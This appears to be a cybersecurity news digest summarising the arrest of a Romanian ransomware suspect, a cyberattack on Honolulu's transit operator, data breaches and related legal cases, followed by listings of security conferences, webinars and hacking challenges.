Romanian ransomware suspect arrested in joint Europol, FBI operation (CyberScoop) A Romanian man accused of using ransomware to target “high-profile” organizations and companies was arrested Monday as part of a joint operation between the Romanian National Police, the FBI, and Europol. The man — identified only as a 41-year-old living in Craiova, Romania — is accused of compromising an unnamed Romanian IT services company with clients in the retail, energy and utilities sectors, according to a Europol statement posted to the agency’s website.
Ransomware affiliate arrested in Romania (The Record by Recorded Future) Romanian police have detained a 41-year-old suspect today in the city of Craiova on suspicion of participating in ransomware attacks across the globe.
Arrest in Romania of a ransomware affiliate scavenging for sensitive data (Europol) The suspect – a 41-year-old Romanian national - was arrested today at his home in Craiova, Romania, in the early hours of the morning. Ransomware with blackmail The criminal is suspected of having compromised the network of a large Romanian IT company delivering services to clients in the retail, energy and utilities sectors. He is then believed to have deployed...
Swiss court allows U.S. extradition of Russian businessman (Reuters) A Swiss court dismissed an appeal by a Kremlin-linked Russian businessman to block his extradition to the United States, rejecting his argument that he was a victim of a U.S. political campaign to snare him on trumped-up insider trading charges.
FBI Investigates Cyber Attack Against TheBus and TheHandi-Van on O‘ahu | Maui Now (Maui Now) The FBI and Cybersecurity and Infrastructure Security Agency are working to investigate the cyber-attack against the operator of the City and County of Honolulu’s systems managing TheBus and TheHandi-Van.
Cyber Attack Against TheBus and TheHandi-Van (Federal Bureau of Investigation) The FBI and CISA are working with federal, state, and local partners to investigate the cyber-attack against the operator of the City and County of Honolulu’s transit systems.
AP seeks answers from US gov't on tracking of journalists (KMTV) The Associated Press is seeking answers from the Department of Homeland Security on its use of sensitive government databases for tracking international terrorists to investigate as many as 20 American journalists, including an acclaimed AP reporter.
Ransomware or Revenge? Former Employee Charged With Extortion (The Daily Beast) A tech company employee was fired for performance issues—and then he sought sloppy revenge, court records obtained by The Daily Beast show.
Transamerica Hit With Lawsuit Over Data Breach (PLANSPONSOR) A retirement plan participant says that, since the data breach, his personal information has been used to make fraudulent purchases and spam calls.
Her Majesty's Revenue and Customs reported 17 serious data breaches to ICO (IBS Intelligence) Her Majesty's Revenue and Customs (HMRC) has reported a total of 17 serious data breaches to the Information Commissioner's Office (ICO) over
For a complete running list of events, please visit the Event Tracker.
QuBit Cybersecurity Conference (Prague (and virtual), the Czech Republic, May 24 - 26, 2022) Qubit Conference Prague 2022 is welcoming all cybersecurity professionals to come and share valuable experience and top ideas on broad branches of topics in cybersecurity development, current trends and regulations, digital transformation and key ways of managing organizations in today’s times, and much more. Receive valuable insights and experience solutions that could make a great impact on your organization and your career path. Qubit Conference offers an atmosphere of “community spirit” where cyberspace professionals come together to learn, debate, exchange and explore best practices, real-life stories, strategies and mind-opening ideas. QuBit offers its delegates as usual excellent speakers, leading edge topics, keynotes, case studies, panel discussions and popular networking events.
2021 SANS Holiday Hack Challenge & KringleCon (Virtual, Dec 13 2021 - Jan 7 2022) Join the global cybersecurity community in its most festive cyber security challenge and virtual conference of the year. The SANS Holiday Hack Challenge is a FREE series of super fun, high-quality, hands-on cybersecurity challenges where you learn new skills, help Santa defeat cybersecurity villains, and save the whole holiday season from treachery. The SANS Holiday Hack Challenge is for all skill levels, with a stellar prize at the end for the best of the best entries.
Reducing Advanced Threat Dwell-Time with Behavior Analytics (Virtual, Dec 15, 2021) Discussion on Security gap covered using Behavior analytics, both in the enterprise and cloud. We will discuss the traditional methods, quick overview of Behavior detection, value prop and operationalizing in a small team.
SOC 2 Type 1 & Type 2- How to Prepare for Audit? (Virtual, Dec 15, 2021) Service Organizations must prioritize and consider investing in the technical process of SOC 2 Audit and Attestation. SOC2 Attestation obtained from an independent AICPA qualified CPA firm is one way to assure customers that their data is safe with the company. But, when it comes to achieving SOC2 Attestation, the entire audit process can be quite overwhelming for Service Organizations. Performing and preparing for the SOC2 Audit is crucial to ensure its success. So, based on the popular demand of our clients and viewers and for the benefit of Service Organization we decided to conduct a webinar on “SOC 2 Type 1 & Type 2- How to Prepare for Audit?”
Access Control and Centralized Defense Free Cyber Defense Clinic (Virtual, Dec 16, 2021) In this clinic, you will work at the policy level by applying network access control and centralized event monitoring. Discover the keys to responding to a cyber-incident. Control access to network resources and monitor event data using Splunk, looking out for malicious threats.
NSA Codebreaker Challenge 2021 (Virtual, Dec 31, 2021) The 2021 Codebreaker Challenge consists of a series of tasks that are worth a varying amount of points based upon their difficulty. Schools will be ranked according to the total number of points accumulated by their students. Solutions may be submitted at any time for the duration of the Challenge. While not required, we recommend that you solve tasks in order, since they flow with the storyline. Later tasks may rely on artifacts / inputs from earlier tasks. Each task in this year's challenge will require a range of skills. We need you to call upon all of your technical expertise, your intuition, and your common sense. Good luck. We hope you enjoy the challenge!
